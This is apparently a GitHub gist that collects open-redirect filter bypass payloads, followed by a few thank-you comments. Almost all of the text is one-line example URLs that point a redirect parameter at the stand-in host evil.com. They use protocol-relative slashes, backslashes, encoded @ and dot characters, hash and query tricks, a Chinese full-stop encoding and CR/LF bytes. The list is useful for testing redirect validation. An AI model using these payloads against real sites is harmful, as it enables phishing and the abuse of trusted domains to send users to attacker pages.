-
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
-
Bypass the filter when protocol is blacklisted using
//Example: ?redirect=https://example.com --> ?redirect=//evil.com
-
Bypass the filter when double slash is blacklisted using
\\Example: ?redirect=https://example.com --> ?redirect=\evil.com
-
Bypass the filter when double slash is blacklisted using
http:orhttps:Example: ?redirect=https://example.com --> ?redirect=https:example.com
-
Bypass the filter using
%40Example: ?redirect=example.com --> ?redirect=example.com%40evil.com
-
Bypass the filter if it only checks for domain name
Example: ?redirect=example.com --> ?redirect=example.comevil.com
-
Bypass the filter if it only checks for domain name using a dot
%2eExample: ?redirect=example.com --> ?redirect=example.com%2eevil.com
-
Bypass the filter if it only checks for domain name using a query/question mark
?Example: ?redirect=example.com --> ?redirect=evil.com?example.com
-
Bypass the filter if it only checks for domain name using a hash
%23Example: ?redirect=example.com --> ?redirect=evil.com%23example.com
-
Bypass the filter using a
°symbolExample: ?redirect=example.com --> ?redirect=example.com/°evil.com
-
Bypass the filter using a url encoded Chinese dot
%E3%80%82Example: ?redirect=example.com --> ?redirect=evil.com%E3%80%82%23example.com
-
Bypass the filter if it only allows you to control the path using a nullbyte
%0dor%0aExample: ?redirect=/ --> ?redirect=/%0d/evil.com
Created
April 1, 2021 19:04
-
-
Save 0xblackbird/d7677a05ea50586cf2be0a601e665d1a to your computer and use it in GitHub Desktop.
Open redirect bypasses
thanks
You're welcome! ;)
helpfull
insabat
Thanks!
Chinese dot! So interesting!
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
thanks